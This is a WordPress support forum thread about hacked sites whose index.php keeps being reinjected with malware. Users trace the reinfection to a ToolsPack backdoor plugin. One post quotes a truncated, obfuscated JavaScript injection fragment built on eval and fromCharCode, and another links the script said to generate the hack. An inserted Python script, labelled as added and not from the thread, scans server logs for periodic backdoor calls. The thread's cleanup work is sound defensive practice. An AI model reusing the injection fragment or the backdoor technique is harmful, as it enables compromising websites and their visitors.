
Malware issue (37 posts)

  1. sharonbarnes
    Member
    Posted 2 years ago #

    Hello,
    I have multiple WordPress sites hosted on one server. Google keeps listing a few of my sites as malware, but when I go and look at the suspected code, it looks like it might be meant to be there. It's on the index.php file of all my sites. The code is below. Could someone tell me if this code is good or bad or if I should get rid of it? I don't understand why Google is saying only one of my sites has malware when they all have this code in the index.php file.

    [removed]

    Thanks!!!

  2. sharonbarnes
    Member
    Posted 2 years ago #

    Also, getting this error when attempting to access the blog:
    Parse error: syntax error, unexpected '<' in /home/content/s/h/a/sharonbarnes/html/cambodianow/wp-content/themes/twentyeleven/index.php on line 14
    Is this a result of hacking? Can someone help me on how to fix this and if I need to change hosting providers?

    Thanks!

  3. adebaby
    Member
    Posted 2 years ago #

    Same here

    <script>if(window.document)try{location(12);}catch(qqq){zz='eval';aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window[zz];t='y';}h=-2*Math.log and then a load of numbers

    I have 2 domains with WordPress hacked on a shared hosting account but 2 other domains with WordPress were unaffected. The affected domains were thankfully much lower use than the others.

    Just replace the index.php with a new copy. All is well after but hard to know if any other files are infected.

    Only thing that I noticed was that the two affected domains had the Twitter for WordPress plugin and the others don't. Could be coincidence.

  4. rana124
    Member
    Posted 2 years ago #

    Reinstall all your WordPress and back up your database.
    That is the safest way.

  5. adebaby
    Member
    Posted 2 years ago #

    The index.php malware script returned within an hour or two. Can't see anything suspicious in the logs, FTP password had been changed. Have replaced all the core files except the content and see if it comes back again.

  6. adebaby
    Member
    Posted 2 years ago #

    There is a post from yesterday about the script which generates the hack:

    pastebin.com/pGmDGqzz

    A few other posts there also have the same JS hack.

  7. sharonbarnes
    Member
    Posted 2 years ago #

    I've changed absolutely all my passwords, deleted the code and it keeps coming back! Help!! I have 5 sites and it would take forever to re-install WordPress on all of them and I'd lose so much data. I don't have a fresh backup available.

  8. adebaby
    Member
    Posted 2 years ago #

    Who is your hosting company? Is it a shared host?

  9. sharonbarnes
    Member
    Posted 2 years ago #

    It's hosted with GoDaddy.

  10. zanzaboonda
    Member
    Posted 2 years ago #

    I read somewhere that the codes are uploaded via "back doors" that are planted in upload, theme, or plugin folders. It's almost impossible (IMHO based on hours and hours wasted) to find them.

    I think I was initially hacked via the timthumb vulnerability. There is a plugin to detect and fix that, if necessary. There are plugins that will also scan your site for vulnerabilities. You *might* be able to find the hacks, but I was never successful.

    I wound up gutting everything and reinstalling from scratch. I'm still having problems... :(

  11. sharonbarnes
    Member
    Posted 2 years ago #

    That's brutal. So even gutting it all didn't fix it for you? Did you change hosting providers?

  12. zanzaboonda
    Member
    Posted 2 years ago #

    I haven't changed hosting providers yet. I have GoDaddy. I put out a call for help, and I want to wait and see what the experts say first.

    http://wordpress.org/support/topic/malware-redirect-hacks-specific-question-regarding-vulnerabilities?replies=1

    I've tried AntiVirus (which found the latest problem before I did), Hide Login, and Secure WordPress. Those three are on my blog that supposedly hasn't been hacked yet, so I'm pretty sure they're safe. But I don't trust anything anymore! lol

    You might want to check out some of these plugin recommendations. I don't know how effective they all are and not all of them are tested with 3.3.1. But they're worth looking into.

    http://allbloggingtips.com/2012/02/03/top-20-best-wordpress-security-plugins/

    They *might* help you figure out where the problem is coming from, depending on your issue.

    One of them had detected a problem with my index.php in Twenty Eleven as well, along with a bunch of other things. But I don't think it's related to the theme itself.

    If you get redirect malware, try this. It checks the files in your theme.

    http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

    I think there was another good plugin, but I can't remember it atm...

    I would also delete any themes and plugins you aren't using. Don't just deactivate them, but delete them.

    Try also checking your site via Sucuri. It will tell you the pages that are producing problems (but that doesn't mean that's where the problems are).

    http://sitecheck.sucuri.net/scanner/

    It might help, though, if you can figure out a common thread. I think many of them have to do with Javascript code? I honestly don't know.

    This whole thing has been a huge wake-up call for me. I just wish I could fix it. lol

  13. adebaby
    Member
    Posted 2 years ago #

    I seem to have found my problem and I wouldn't be surprised if Sharon has the same problem.

    I had two sites in a hosting plan infected. One site was a dormant WordPress site locked with absolute security plugin which is apparently not secure now.

    http://blog.sucuri.net/2012/02/vulnerability-in-the-absolute-privacy-plugin.html

    I then looked on the server logs for this site and saw that a Russian server 83.69.224.224 was calling /wp-content/plugins/ToolsPack/ToolsPack.php every hour. I deleted all the files on this site a few hours ago and I can see that ToolsPack was being hit until I deleted it and now it is a 404 and since then my server is so far OK. The same blog also has an article on this ToolsPack:

    http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html

    I don't recall using this ToolsPack plugin but somehow it got installed, probably through the Absolute Privacy plugin.

    Check all your plugin folders for this plugin.

    Edit: Absolute Privacy has been fixed now but the plugin had not been updated on my server.
    http://wordpress.org/support/topic/absolute-privacy-badly-broken?replies=12
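
The log check described in the post above, as an added example that is not part of the original thread: it groups direct requests to PHP files under `wp-content` by client and path and reports those arriving at a near-constant interval. It assumes Apache "combined" log format; the function name, thresholds and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample in Apache "combined" format; IPs are documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Mar/2012:01:00:03 +0000] "POST /wp-content/plugins/ToolsPack/ToolsPack.php HTTP/1.1" 200 12 "-" "-"
203.0.113.20 - - [01/Mar/2012:01:12:40 +0000] "GET / HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2012:02:00:05 +0000] "POST /wp-content/plugins/ToolsPack/ToolsPack.php HTTP/1.1" 200 12 "-" "-"
203.0.113.20 - - [01/Mar/2012:02:30:11 +0000] "GET /wp-content/themes/twentyeleven/style.css HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
203.0.113.35 - - [01/Mar/2012:02:41:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2012:03:00:01 +0000] "POST /wp-content/plugins/ToolsPack/ToolsPack.php HTTP/1.1" 200 12 "-" "-"
198.51.100.7 - - [01/Mar/2012:04:00:04 +0000] "POST /wp-content/plugins/ToolsPack/ToolsPack.php HTTP/1.1" 404 310 "-" "-"
"""

# client IP, timestamp, method, URL, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# PHP files requested directly inside plugin, theme or upload folders
DIRECT_PHP = re.compile(r'^/wp-content/(?:plugins|themes|uploads)/.+\.php$', re.I)

def find_periodic_callers(log_text, min_hits=3, max_jitter=0.1):
    """Return (ip, path) pairs that are requested at a steady interval."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, _method, url, status = m.groups()
        path = url.split("?", 1)[0]
        if DIRECT_PHP.match(path):
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
            hits[(ip, path)].append((when, int(status)))
    findings = []
    for (ip, path), events in hits.items():
        if len(events) < min_hits:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        avg = mean(gaps)
        # Low relative spread between gaps means a scheduled caller, not a visitor.
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            findings.append({"ip": ip, "path": path, "hits": len(events),
                             "interval_min": round(avg / 60),
                             "last_status": events[-1][1]})
    return findings

if __name__ == "__main__":
    for finding in find_periodic_callers(SAMPLE_LOG):
        print(finding)
```

A `last_status` of 404 matches what the post reports after the plugin folder was deleted; a legitimate plugin endpoint polled on a schedule would also be listed, so each reported path still needs to be checked against the plugins actually installed.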

  14. zanzaboonda
    Member
    Posted 2 years ago #

    Good tip. I don't remember seeing that one myself, but I'll keep an eye out for it.

    Hope it helps her. Thanks for the heads up.

  15. ClaytonJames
    Member
    Posted 2 years ago #

    Some of the code in this post contains a link/is triggering a warning for a blackhole exploit kit.

  16. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

  17. zanzaboonda
    Member
    Posted 2 years ago #

    @Clayton.James Can you explain your comment? I'm not sure I understand what you meant.

    @kmessinger I've seen some of those articles but not all. Thanks for posting. IYO, what's the best way to "harden" WP? I got hacked on a fresh install that was less than 12 hours old and had security plugins installed.

    I'm beginning to think it's a problem with GoDaddy... Any secure (and inexpensive) hosting recommendations?

  18. sharonbarnes
    Member
    Posted 2 years ago #

    adebaby: That sounds promising. Stupid question: how do I access my server logs? I've been looking all over the place and can't figure it out.

    Thanks

  19. adebaby
    Member
    Posted 2 years ago #

    It will be in your admin pages somewhere. But I would get an FTP program and look in all your WordPress plugins for toolpack and check existing plugins are up to date and secure. Remove any old plugins you don't need.

  20. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    I followed everything here, http://codex.wordpress.org/Hardening_WordPress.

    I have Web Defender monitor the site. They do one for free.

    Still, at the big security conference here in SF last week, the consensus was the hackers are winning.

  21. adebaby
    Member
    Posted 2 years ago #

    Someone wrote that Russian servers should be banned from the internet due to all the trouble they cause. Can agree now.

  22. sharonbarnes
    Member
    Posted 2 years ago #

    @adebaby I FOUND that Toolsbox plugin! It was from the same IP that you had. Now in the process of cleaning everything out and changing passwords. Thanks!

  23. ClaytonJames
    Member
    Posted 2 years ago #

    @zanzaboonda

    The code example posted by sharonbarnes is triggering a malware warning when trying to access this conversation. Users of a Windows operating system and AVG antivirus will probably experience AVG as identifying the code (correctly, or incorrectly) as an active exploit "in this thread", and it will aggressively deny any access to it, leaving the user with the impression that there is a virus on the page you are now currently reading. :-)

    I tagged the thread with a "modlook", and my comment was just a short note to any mod that saw it, so that they could do whatever they needed to prevent the virus warning. Sorry for any confusion!

  24. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    That is why I encourage folks not to post malware code or even parts of it.

  25. sharonbarnes
    Member
    Posted 2 years ago #

    @ClaytonJames @kmessinger Sorry...I didn't realize that would happen. I've never been hacked before :(

  26. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    No worries. When folks get hacked they go into panic mode.

  27. zanzaboonda
    Member
    Posted 2 years ago #

    @ClaytonJames Ah, I gotcha. Thanks for the explanation.

    @kmessinger Thanks so much for all of your help. :)

  28. ClaytonJames
    Member
    Posted 2 years ago #

    I didn't realize that would happen. I've never been hacked before :(

    Don't worry sharon, It gets easier the second time...

    I'm kidding, really, just KIDDING I say!!! I'm so, so, sorry. I just couldn't help myself!

    (Holy cow, what the heck is wrong with me?) I'm very sorry. ...twisted sense of humor.

    LMAO :-)

  29. sharonbarnes
    Member
    Posted 2 years ago #

    I will be buffing up my security big time and doing backups all the time, that's for sure! Thanks for the help :)

  30. adebaby
    Member
    Posted 2 years ago #

    I'm thinking of splitting my hosting. Multi-domain hosting on one account is convenient but not as secure.

Topic Closed

This topic has been closed to new replies.
